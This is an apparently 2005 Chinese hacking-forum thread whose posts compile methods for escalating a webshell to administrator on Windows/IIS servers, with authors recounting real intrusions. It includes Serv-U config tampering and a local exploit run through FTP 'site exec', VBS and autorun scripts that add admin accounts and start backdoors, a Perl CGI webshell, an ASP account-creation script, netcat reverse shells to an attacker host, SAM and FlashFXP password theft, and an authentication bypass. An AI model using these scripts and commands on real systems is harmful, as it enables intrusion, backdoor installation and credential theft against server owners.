以文本方式檢視主題 - 電白社群 (http://www.525400.net/index.asp) -- 網絡與安全 (http://www.525400.net/list.asp?boardid=76) ---- 目前黑客入侵伺服器提升權限總結 (http://www.525400.net/dispbbs.asp?boardid=76&id=3073) | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:30:37 -- 目前黑客入侵伺服器提升權限總結 通過webshell獲得admin全攻略 話說到花了九牛二虎的力氣獲得了一個webshell, 當然還想繼續獲得整個伺服器的admin權限,正如不想得到admin的不是好黑客~ 嘻嘻~~好跟我來,看看有什麼可以利用的來提升權限 **************************************************************************** 第一 如果伺服器上有裝了pcanywhere服務端,管理者為了管理友善 也給了我們友善,到系統盤的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下載下傳*.cif本地 破解就使用pcanywhere連接配接就ok了 **************************************************************************** 第二 有很多小黑問我這麼把webshell的iis user權限提升 一般伺服器的管理都是本機設計完畢然後上傳到空間裡,那麼就會用到ftp,服務 器使用最多的就是servu 那麼我們就利用servu來提升權限 通過servu提升權限需要servu安裝目錄可寫~ 好開始把,首先通過webshell通路servu安裝檔案夾下的ServUDaemon.ini把他下載下傳 下來,然後在本機上安裝一個servu把ServUDaemon.ini放到本地安裝檔案夾下覆寫, 啟動servu添加了一個使用者,設定為系統管理者,目錄C://,具有可執行權限 然後去servu安裝目錄裡把ServUDaemon.ini更換伺服器上的。 用我建立的使用者和密碼連接配接~ 好的,還是連上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //剛才添加的使用者 331 User name okay, please send complete E-mail address as password. Password:password //密碼 230 User logged in, proceed. ftp> cd winnt //進入win2k的winnt目錄 250 Directory changed to /WINNT ftp>cd system32 //進入system32目錄 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系統的net.exe 檔案加使用者。 如果提示沒有權限,那我們就 把後門(server.exe) 傳他system32目錄 然後寫一個VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0) 存為xx.vbe 這個教本的作用是建立user使用者密碼為pass 并且提升為管理者 然後執行system32目錄下的server.exe 把這個教本傳他 C://Documents and Settings//All Users//「開始」菜單//程式//啟動 目錄 這樣管理者隻要一登陸就會執行那個教本. 接下來就是等了.等他登陸. **************************************************************************** 第三 就是先檢查有什麼系統服務,或者随系統啟動自動啟動的程式和管理者經常使用的軟體, 比如諾頓,VAdministrator,金山,瑞星,WinRAR甚至QQ之類的,是否可以寫,如果可以就修改其程式, 綁定一個批處理或者VBS,然後還是等待伺服器重新開機。 **************************************************************************** 第四 查找conn和config ,pass這類型的檔案看能否得到sa或者mysql的相關密碼,可能會有所 收獲等等。 **************************************************************************** 第五 使用Flashfxp也能提升權限,但是成功率就看你自己的運氣了 首先找到FlashFXP檔案夾,打開(編輯)Sites. dat,這個檔案這是什麼東西密碼和使用者名, 而且密碼是加了密的。 如果我把這些檔案copy回本地也就是我的計算機中,替換我本地的相應檔案。然後會發現 打開flashfxp在站點中打開站點管理器一樣。又可以添加N多殭屍電腦啦~~嘻嘻~ 唔??不對啊,是來提升權限的啊,暈,接着來别半途而廢。 大家看看對方管理者的這站點管理器,有使用者名和密碼,密碼是星号的。經過用xp星号密碼 檢視器檢視,然後和Sites.dat中加密了密碼做比較發現并未加密而是查到的密碼是明文顯示, 然後最終把這個網站管理者的密碼從這堆東西中找 出來。那麼下一步就可以連結這些新的伺服器啦~~ 經過測試隻要把含有密碼和使用者名的Sites.dat檔案替換到本地相應的檔案就可以在本地 還原對方管理者的各個站點的密碼。 **************************************************************************** 第五 WIN2K+IIS5.0預設情況下應用程式保護選項是“中(共用的)”,這時IIS加載isapi是用的 iwam_computername使用者身份執行。 但預設情況下WIN2K+IIS5對于一些特殊isapi又要以system身份加載。win2k+iis5 、 win2k+iis5+sp1、win2k+iis5+sp2都是簡單的判斷isapi的檔案名,并且沒有做目錄限制, 以SYSTEM權限加載的isapi有: 1、 idq.dll 2、 httpext.dll 3、 httpodbc.dll 4、 ssinc.dll 5、 msw3prt.dll 6、 author.dll 7、 admin.dll 8、 shtml.dll 9、 sspifilt.dll 10、compfilt.dll 11、pwsdata.dll 12、md5filt.dll 13、fpexedll.dll 是以利用這很容易得到SYSTEM權限。并且判斷檔案名的時候有個bug,比如請求/scripts/test %81%5cssinc.dll也将會認為是請求的ssinc.dll,就是分離檔案路徑的時候沒有考慮到雙位元組的 遠東版問題。ssinc.dll在處理包含檔案路徑的時候也有一個問題,就是"/"、"//"隻識别了一個 "/",是以如果請求裡面使用"//",就會錯誤的處理包含檔案路徑,有可能洩露東西或者出現權限 漏洞,這種漏洞很多别的地方( php、asp等)也還存在。 加載這些isapi不是單以檔案名做依據了,而是加了路徑,應該是修正了此問題。 一般預設情況下是: 1、 idq.dll d://winnt//system32//idq.dll 2、 httpext.dll d://winnt//system32//inetsrv//httpext.dll 3、 httpodbc.dll d://winnt//system32//inetsrv//httpodbc.dll 4、 ssinc.dll d://winnt//system32//inrtsrv//ssinc.dll 5、 msw3prt.dll d://winnt//system32//msw3prt.dll 6、 author.dll D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//_vti_aut//author.dll 7、 admin.dll D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//_vti_adm//admin.dll 8、 shtml.dll D://Program Files//Common Files//Microsoft Shared//web server extensions//40//isapi//shtml.dll 9、 sspifilt.dll d://winnt//system32//inetsrv//sspifilt.dll 10、compfilt.dll d://winnt//system32//inetsrv//compfilt.dll 11、pwsdata.dll d://winnt//system32//inetsrv//pwsdata.dll 12、md5filt.dll d://winnt//system32//inetsrv//md5filt.dll 13、fpexedll.dll D://Program Files//Common Files//Microsoft Shared//web server extensions//40//bin//fpexedll.dll 正常情況下這些路徑都guest不能寫,但如果配置不好,這些路徑iis user能夠寫了就一樣可以提升權限了 可以把ISAPIHack.dll上傳到IIS的可執行目錄,檔案名可叫ssinc.dll或者admin.dll等(上面列的13個檔案名之一)。 然後等待IIS重新開機加載此dll,就可以獲得權限了 **************************************************************************** 第六 下載下傳系統的 %windir%//repair//sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)檔案, 然後用L0pht等軟體進行破解,隻要能拿到,肯花時間,就一定可以破解。 **************************************************************************** 第七 PipeUpAdmin(Windows 2000下), 在本機運作可以把目前使用者帳号加入管理者組。普通使用者 和Guests組使用者都可以成功運作。 **************************************************************************** 第八 Serv-u Ftp Server 本地權限提升漏洞: 很多主機的C://Documents and Settings//All Users// Documents目錄以 及下邊幾個子目錄Documents沒有設定權限,導緻可以在這個目錄上傳并 運作Exp. 直接上傳了serv-u local exploit 和nc, 并且把serv-u的本地提升權限的名字命名為su.exe 檔案就放在C://Documents and Settings//All Users// Documents, 然後我們用su.exe直接建立使用者,也可以反彈一個shell過來的。 具體指令: 建立使用者: serv-u.exe "cmd" >USER xl >PASS 111111 反彈shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:31:00 -- WEBSHELL權限提升 動網上傳漏洞,相信大家拿下不少殭屍電腦吧,但是都是WEBSHELL,不能拿到系統權限,要如何拿到系統權限呢?這正是我們這次要讨論的内容 OK,進入我的WEBSHELL 啊哈,不錯,雙CPU,速度應該跟的上,不拿下你我怎麼甘心啊 輸入密碼,進入到裡面看看,有什麼好東西沒有,翻了下,好像也沒有什麼特别的東西,看看能不能進到其他的盤符,點了下C槽,不錯不錯,可以進去,這樣提升就大有希望了 一 serv-u提升 OK,看看他的PROGRAME裡面有些什麼程式,哦,有SERV-U,記得有次看到SERV-U有預設的使用者名和密碼,但是監聽的端口是43958,而且是隻有本地才能通路的,但是我們有端口轉發工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21 顯示竟然是3.0的,唉,不得不說這個管理者真的不稱職。後來完畢後掃描了下,也隻有FTP的洞沒有補。既然是這樣,我們就開始我們的提升權限了 上傳FPIPE,端口轉發工具, 圖三 在運作CMD指令裡輸入d://wwwroot//fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口 然後打開我們自己機子上的SERV-U,點Serv-U伺服器,點菜單欄上的的伺服器,點建立伺服器,然後輸入IP,輸入端口,記得端口是剛剛我們轉發的81端口。服務名稱随便你喜歡,怎麼樣都行。然後是使用者名:LocalAdministrator 密碼:#[email protected]$ak#.lk;[email protected] (密碼都是字母) 确定,然後點剛剛建的伺服器,然後就可以看到已有的使用者,自己建立一個使用者,把所有權限加上。也不鎖定根目錄 接下來就是登陸了,登陸FTP一定要在CMD下登陸, 進入後一般指令和DOS一樣,添加使用者的時候 ftp>quote site exec net.exe user hk pass /add ftp>quote site exec net.exe localgroup administrators hk/add 如果對方開了3389的話,就不用我教你怎麼做了,沒開的話,建立立IPC連接配接,在上傳木馬或者是開啟3389的工具 二 auto.ini 加 SHELL.VBS autorun.inf [autorun] open=shell.vbs shell.vbs dim wsh set wsh=CreateObject("WScript.Shell") wsh.run "net user guest /active:yes",0 wsh.run "net user guest 520ls",0 wsh.run "net localgroup administrators guest /add",0 wsh.run "net user hkbme 520ls /add",0 wsh.run "net localgroup administrators hkbme /add",0 wsh.run "cmd.exe /c del autorun.inf",0 wsh.run "cmd.exe /c del shell.vbs",0 但是這樣要可以通路到對方的根目錄。将這兩個檔案放到對方硬碟的根目錄下。當然你也可以直接執行木馬程式,還要一個木馬程式,但是語句就和最後兩句一樣,通過CMD執行木馬程式 三 Folder.htt與desktop.ini 将改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什麼,放到對方管理者最可能浏覽的目錄下,覺得一個不夠,可以多放幾個 Folder.htt添加代碼 <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的後門檔案名”> </OBJECT> 但是後門和這兩個檔案必須要放到一塊,有點問題,可以結合啟動VBS,運作結束後,删除上傳的後門.就是CODEBASE="shell.vbs".shell寫法如上 四 replace 替換法,可以替換正在執行的檔案。用這個幾乎可以馬上得到權限,但是我沒有做過試驗,可以試下,将對方正在執行的檔案替換為和它檔案名一樣的,捆綁了木馬的。為什麼不直接替換木馬呢?如果替換的是關鍵程式,那不是就直接挂了?是以還是捆綁好點 格式 REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/R] [/W] REPLACE [drive1:][path1]filename [drive2:][path2] [/R] [/S] [/W] [drive1:][path1]filename 指定源檔案。 [drive2:][path2] 指定要替換檔案的 目錄。 /A 把新檔案加入目标目錄。不能和 /S 或 /U 指令行開關搭配使用。 /P 替換檔案或加入源檔案之前會先提示您 進行确認。 /R 替換隻讀檔案以及未受保護的 檔案。 /S 替換目标目錄中所有子目錄的檔案。 不能與 /A 指令選項 搭配使用。 /W 等您插入磁盤以後再運作。 /U 隻會替換或更新比源檔案日期早的檔案。 不能與 /A 指令行開關搭配使用 這個指令沒有試驗過,看能不能替換不能通路的檔案夾下的檔案,大家可以試驗下 五 腳本 編寫一個啟動/關機腳本配置檔案scripts.ini,這個檔案名是固定的,不能改變。内容如下: [Startup] 0CmdLine=a.bat 0Parameters= 将檔案scripts.ini儲存到“C://winnt//system32//GroupPolicy//Machine//Scripts” A.BAT的内容可以是NET USER yonghu mima 也可以是NET USER ADMINistrator XXX 這樣可以恢複你想要得任意使用者名的密碼,也可以自己增加新的使用者,但是要依賴重新開機,還有就是對SYSTEM32有寫的權限 六 SAM 如果可以通路對方的SYSTEM32的話,删除對方的SAM檔案,等他重新開機以後就是ADMIN使用者密碼為空 突然又有了想法,可以用REPLACE指令替換的嗎,可以把你的SAM檔案提取出來,上傳到他的任意目錄下,然後替換。不過不知道如果對SYSTEM32沒有權限通路的話,能不能實作替換 | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:31:14 -- 使用FlashFXP來提升權限 最近各位一定得到不少殭屍電腦吧:),從前段時間的動網的upfile漏洞, 動力文章系統最新漏洞到first see發現的動網sql版本的一個超級大漏洞。有人一定忙的不易樂乎,大家的方法也不過是使用一下asp腳本的後門罷了。至于提 升權限的問題 呵呵,很少有人能作一口氣完成。關鍵還是在提升權限上做個問題上,不少伺服器設定的很BT,你的asp木馬可能都用不了,還那裡 來的提升啊。我們得到webshell也就是個低級别的使用者的權限,各種提升權限方法是可謂五花八門啊,如何提升就看你自己的妙 招了。 其一,如果伺服器上有裝了pcanywhere服務端,管理者為了便于管理也給了我們友善,到系統盤的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載下傳*.cif本地破解就使用pcanywhere連接配接就ok了。 其二,如果對方有Serv-U大家不要罵我啊,通過修改ServUDaemon.ini和fpipe這軟體提升權限應該是不成問 題吧。 其三,通過替換系統服務來提升。 其四,查找conn和config這類型的檔案看能否得到sa或者mysql的相關密碼,可能會有所收獲等等。 本人在一次無聊的入侵過程中發現了這個方法,使用Flashfxp也能提升權限,但是成功率高不高就看你自己的運氣了:) 本人在www.xxx.com 通過bbs得到了一個webshell,放了個小馬(現在海陽的名氣太大了偶不敢放),而且已經将一段代碼插入了N個檔案中,夠 黑吧。提升權限沒時間做。在我放假回家後,一看我暈bbs更新到動網sp2了我放的小馬也被K了,人家的BBS是access版 本的。郁悶啊!突然想起我将一個頁面插入了asp的後門,看看還有沒有希望了。輸入www.xxx.com/xx.asp?id =1 好家夥,還在!高興ing 圖1 于是上傳了一個asp的腳本的後門,怎麼提升權限呢? 在這個網站的主機上遊蕩了N分鐘,在C:// Program Files下發現了FlashFXP檔案夾(跟我一樣使用這個軟體自己心裡暗想)圖2,于是就打了了Sites. dat這個檔案(編輯)這是什麼東西密碼和使用者名,而且密碼是加了密的。 如果我把這些檔案copy回本地也就是我的計算機中,替換我本地的相應檔案會怎麼樣呢? 于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個檔案下載下傳到我的計算機中替換了我電腦中flashfxp檔案夾的相應檔案。打開flashfxp 在站點中打開站點管理器一項。乖 乖發财了 對方管理者通過flashfxp連接配接的各個站點都在圖3,點選連接配接。通過了于是我們又有了一堆殭屍電腦,我們有ftp權限。上傳腳本 木馬~ 呵呵。 說了半天這提升權限的事情一點沒講啊 不要急,大家看看對方管理者的這站點管理器,有使用者名和密碼,密碼是星号的。可惜啊! 又想起了在Sites.dat中也顯示了密碼和使用者名,而且密碼是加密的。 現在的星号密碼會不會也是加了密的?看看就行了呗。 怎麼看? 菜鳥了吧 手頭有個不錯的檢視星号的軟體,就是xp星号密碼檢視器,通過檢視跟Sites.dat中加密了密碼做比較。看圖4和圖5 的比較 很顯然在站點管理器中檢視到的密碼是明文顯示的。發财了吧 下一步就是使用xp星号密碼檢視器這個軟體來提取密碼和使用者名。看者這些複雜的密碼,還真有點懷念當年玩sniff的時光。呵呵 密碼為:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+ 使用者名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69 (上述部分密碼和使用者名已經作了必要的修改) 這麼多的資訊,按社會工程學的概念來說,沒有管理者的密碼。打死我也不相信。最終我得到了這個網站管理者的密碼從這堆東西中找到 的。 我想這個問題應該回報到flashfxp官方,讓他們在下個版本中修正這個漏洞或者說是錯誤。經過後來測試隻要把含有密碼和使用者 名的Sites.dat檔案替換到本地相應的檔案就可以在本地還原對方管理者的各個站點的密碼。希望大家在入侵的時候遇到fla shfxp的時候能想到這個方法,至少也可以得到一堆新的殭屍電腦。不防試試?希望能給大家滲透帶來幫助。 <!-- Message body /'/'"" --> | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:31:29 -- 将asp權限提到最高by: cnqing from:http://friend.91eb.com 本來是要寫個提權asp木馬的,可惜時間不是太多功底也不是太深。先把原理方法告訴大家好了。簡單說說,說的太麻煩沒有必要。懂了就行。 原理: asp檔案的教本解釋是由asp.dll運作的。由dllhost.exe啟動的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接啟動。身份是system 方法: 第一步。 得到inprocesslsapiapps内容,用指令"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一組dll複制下來。 第二步 寫一個bat内容為"cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" ····· 省略号為複制下的内容。中間用空格分開不要帶回車符 最後運作這個bat就行了。 例如: 我用"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"得到 "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll" 那麼你的bat就應該是: cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll" 已測試成功!! | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:31:44 -- 利用%5c繞過驗證 --------------------------------------- lake2(http://mrhupo.126.com) 2004-11-27 --------------------------------------- 說到%5c,你是不是想起了目前流行的那個%5c暴庫漏洞,呵呵,本文就是對%5c利用的探索(呵呵,當然有我提出的新東東,或許對你有幫助哦^_^)。 好,我們先追根溯源,找到那個漏洞的老底。看看綠盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429 N年以前利用這個漏洞可以實作目錄周遊,雖然微軟出了更新檔,不過好像更新檔是用來限制iis隻能通路虛拟目錄的,是以漏洞還是存在,隻不過利用方式變了。對iis來說,送出一個含有%5c的url能夠找到檔案,但是該檔案裡以相對路徑引用的其他檔案卻找不到了(%5c是//的url編碼,iis跳轉到上一級目錄去找,當然找不到;頭暈了吧,哈哈,我也頭暈啊)。 後來這個漏洞就被牛人挖掘出來了,也就是傳說中的%5c暴庫:由于連接配接資料庫的檔案引用的相對路徑,送出%5c找不到檔案,是以導緻出錯,iis就會老老實實的說出資料庫的路徑(不明白?找google)。 一個偶然的機會我發現還可以利用%5c繞過asp的驗證;當我們暴庫失敗的時候不妨試試。 廢話少說,看下面的代碼: <!--#INCLUDE file="conn.asp" --> <% guest_user=trim(request("guest_user")) guest_password=trim(request("guest_password")) Set rs= Server.CreateObject("ADODB.Recordset") sql="select * from admin where id=1" rs.open sql,conn,3,2 readuser=rs("guest_user") readpassword=rs("guest_password") if readuser<>guest_user or readpassword<>guest_password then response.write "請輸入正确地管理者密碼!" response.end else session("admin")=1 /'登陸後寫入seesion中儲存 response.write("登陸成功,請傳回資訊頁") end if %> 看到沒有,要想通過驗證必須讓資料庫裡的使用者名密碼與送出的一緻;想到什麼?讓我們再看看資料庫連接配接檔案代碼: <% on error resume next set conn=server.createobject("adodb.connection") DBPath = Server.MapPath("guestbook.asp") conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath %> 啊,有容錯語句不能暴庫!等等,如果送出%5c資料庫找不到,由于容錯,是以程式會繼續執行,那麼說來從資料庫得到的使用者名密碼皆為空(想想有時暴庫失敗是不是看到空空的架構,因為資料都是空嘛),哈哈,這樣我們就繞過驗證了! 知道怎麼做了吧,把登陸頁面儲存到本地,修改送出的url,把最後一個/改成%5c,使用者名密碼用空格(有的程式會檢查使用者名密碼是否為空,空格會被程式過濾),送出,就ok了。 诶,各位不要以為我自己沒事寫段代碼來搗鼓,實際上這個是我們學校一個高手做的留言闆程式,就挂在學校的首頁,呵呵。 既然弄懂了原理,當然要找實際漏洞啦,自然是拿大名鼎鼎的“洞”網論壇開刀。不過失敗了,因為它的資料庫連接配接檔案裡有這麼一段: If Err Then err.Clear Set Conn = Nothing Response.Write "資料庫連接配接出錯,請檢查連接配接字串。" Response.End End If 資料庫找不到程式就結束了,呵呵,空歡喜一場。 接着又去down了bbsxp論壇,打開資料庫連接配接檔案,暈,根本沒有容錯語句;呵呵,不過可以暴庫哦。 我又不是BT,是以不去找事了,寫篇文章,算是給各位高手提供資料吧。 總結一下這個攻擊方法成功的條件:1、資料庫連接配接用的相對路徑且僅有簡單的容錯語句;2、伺服器iis版本為4或5;3、程式裡不檢查空字元或者檢查時不過濾空格而比較時過濾空格;4、程式不能在一級目錄 至于防範,呵呵,既然攻擊條件知道了,防範措施自然也出來了^_^ | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:32:05 -- 提升權限終極技巧 作者:WekweN http://www.wrsky.com 本篇文章結合了許多高手提升權限的技巧和自己的一些想法 當我們取得一個webshell時候,下一部要做的就是提升權限 個人總結如下: 1: C://Documents and Settings//All Users//Application Data//Symantec//pcAnywhere看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF檔案,得到pcAnywhere密碼,登陸 ps: 破解工具本站已提供。請自己Search一下! 2.C://WINNT//system32//config進這裡下它的SAM,破解使用者的密碼 用到破解sam密碼的軟體有LC,SAMinside 3.C://Documents and Settings//All Users//「開始」菜單//程式看這裡能跳轉不,我們從這裡可以擷取好多有用的資訊 可以看見好多快捷方式,我們一般選擇Serv-U的,然後本地檢視屬性,知道路徑後,看能否跳轉 進去後,如果有權限修改ServUDaemon.ini,加個使用者上去,密碼為空 [USER=WekweN|1] Password= HomeDir=c:TimeOut=600 Maintenance=System Access1=C://|RWAMELCDP Access1=d://|RWAMELCDP Access1=f://|RWAMELCDP SKEYValues= 這個使用者具有最高權限,然後我們就可以ftp上去 quote site exec xxx 來提升權限 4.c://winnt//system32//inetsrv//data就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行 5.看能否跳轉到如下目錄 c://php, 用phpspy c://prel,有時候不一定是這個目錄(同樣可以通過下載下傳快捷方式看屬性獲知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html//r//n//r//n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f/ig; $execthis = $_; syswrite(STDOUT, "<HTML><PRE>//r//n", 13); open(STDERR, ">&STDOUT") || die "Can/'t redirect STDERR"; system($execthis); syswrite(STDOUT, "//r//n</PRE></HTML>//r//n", 17); close(STDERR); close(STDOUT); exit; 儲存為cgi執行, 如果不行,可以試試 pl 擴充呢,把剛才的 cgi 檔案改為 pl 檔案,送出 http://anyhost//cmd.pl?dir 顯示"拒絕通路",表示可以執行了!馬上送出:先的上傳個su.exe(ser-u提升權限的工具)到 prel的bin目錄 http://anyhost//cmd.pl?c//perl//bin//su.exe 傳回: Serv-u >3.x Local Exploit by xiaolu USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 現在是 IUSR 權限,送出: http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe e: /E /T /G everyone:F" http://anyhost//cmd.pl?c//perl//bin//su.exe "cacls.exe f: /E /T /G everyone:F" 如果傳回下面的資訊,就表示成功了 Serv-u >3.x Local Exploit by xiaolu <220 Serv-U FTP Server v5.2 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #[email protected]$ak#.lk;[email protected] <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=2 <220 Domain settings saved ****************************************************** [+] Domain xl:2 created [+] Creating Evil User <200-User=xl 200 User settings saved ****************************************************** [+] Now Exploiting... >USER xl <331 User name okay, need password. ****************************************************** >PASS 111111 <230 User logged in, proceed. ****************************************************** [+] Now Executing: cacls.exe c: /E /T /G everyone:F <220 Domain deleted 這樣所有分區為everyone完全控制 現在我們把自己的使用者提升為管理者: http://anyhost//cmd.pl?c//perl//bin//su.exe " net localgroup administrators IUSR_anyhost /add" 6.可以成功運作"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"來提升權限 用這個cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps 檢視有特權的dll檔案:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 再将asp.dll加入特權一族 asp.dll是放在c://winnt//system32//inetsrv//asp.dll (不同的機子放的位置不一定一樣) 我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT//system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll""c://winnt//system32//inetsrv//asp.dll" 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來檢視是不是加進去了 7.還可以用這段代碼試提升,好象效果不明顯 <%@codepage=936%><%Response.Expires=0 on error resume next Session.TimeOut=50 Server.ScriptTimeout=3000 set lp=Server.createObject("WSCRIPT.NETWORK") oz="WinNT://"&lp.ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob.create("user","WekweN$") od.SetPassword "WekweN" <-----密碼 od.SetInfo Set of=GetObject(oz&"/WekweN$,user") oe.Add(of.ADsPath) Response.write "WekweN$ 超級帳号建立成功!"%> 用這段代碼檢查是否提升成功 <%@codepage=936%> <%Response.Expires=0 on error resume next /'查找Administrators組帳号 Set tN=server.createObject("Wscript.Network") Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") For Each admin in objGroup.Members Response.write admin.Name&"<br>" Next if err then Response.write "不行啊:Wscript.Network" end if %> 8.C://Program Files//Java Web Start這裡如果可以,一般很小,可以嘗試用jsp的webshell,聽說權限很小,本人沒有遇見過。 9.最後了,如果主機設定很變态,可以試下在c://Documents and Settings//All Users//「開始」菜單//程式//啟動"寫入bat,vbs等木馬。 等到主機重新開機或者你ddos逼它重新開機,來達到權限提升的目的。 總結起來說就是,找到有執行和寫入的目錄,管他什麼目錄,然後上傳提升工具,最後執行,三個字"找" "上""執" 以上是本人的拙見,大家有什麼好的方法多多分享 WekweN 04.12.12 | |
-- 作者:小飛 -- 釋出時間:2005-2-23 21:33:12 -- 如何繞過防火牆提升權限 本文講的重點是webshell權限的提升和繞過防火牆,高手勿笑。 廢話少說,咱們進入正題。 首先确定一下目标:http://www.sun***.com ,常見的虛拟主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell,不是DVBBS,而是自由動力3.6的軟體上傳過濾不嚴。網站http://www.sun***.com/lemon/Index.asp是自由動力3.6文章系統。Xr運用WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp,用過動鲨的door.exe的人都知道,這個是上傳asp木馬内容的。于是,上傳海洋2005a,成功獲得webshell。 測試一下權限,在cmd裡運作set,獲得主機一些資訊,系統盤是D盤,也說明了我們的webshell有運作權限的。那我們看看C槽有什麼呢?難道是雙系統?浏覽後發現沒有什麼系統檔案,隻有一些垃圾檔案,暈死。沒關系,再來檢查一下,虛拟主機都有serv-u的,這台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。 思路:上傳serv-u本地溢出檔案srv.exe和nc.exe利用nc來反連接配接獲得系統shell。大家是不是發現海洋2005a那個上傳的元件不好用(反正我總遇到這個問題),沒關系,用rain改的一個無元件上傳,一共有3個檔案,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個檔案夾,up.htm是本地用的,修改up.htm裡的連結位址為:http://www.sun***.com/lemon/upload.asp就可以上傳了。 傳上了srv.exe和nc.exe在H://long//sun***//lemon(網站目錄)後,發現沒有運作權限。沒關系,根據經驗,一般系統下D://Documents and Settings//All Users//是應該有運作權限的。于是想把檔案copy過去,但是發現我們的webshell沒有對D盤寫的權限,暈死。 可以浏覽D://program files//serv-u//ServUDaemon.ini,不能改,難道要破解serv-u的密碼,暈,不想。 不可以這麼就洩氣了,我突然想到為什麼系統不放在C槽了,難道C槽是FAT32分區的?(後來證明了我們的想法。這裡說一下,如果主機有win98的系統盤,那裡99%是FAT32分區的。我們還遇到過裝有Ghost的主機,為了友善在DOS下備份,它的備份盤一般都是FAT分區的。)如果系統盤是FAT32分區,則網站就沒有什麼安全性可言了。雖然C槽不是系統盤,但是我們有執行權限。呵呵,copy srv.exe和nc.exe到c://,運作 srv.exe “nc.exe –e cmd.exe 202.*.*.* 888”,這裡的202.*.*.*是我們的殭屍電腦,在這之前我們已經在殭屍電腦上運作了nc –l –p 888。我們在學校内網裡,沒有公網ip,不爽-ing。 我們成功獲得一個系統shell連上殭屍電腦。(看起來簡單,其實這裡我們也遇到過挫折,我們發現有些版本的nc居然沒有-e這個參數,還以為全世界nc功能都一樣。後來又發現不同版本的nc互連不成功,會出現亂碼,沒辦法用。為此,上傳n次,錯誤n次,傻了n次,後來終于成功了。做黑客還真得有耐心和恒心。) 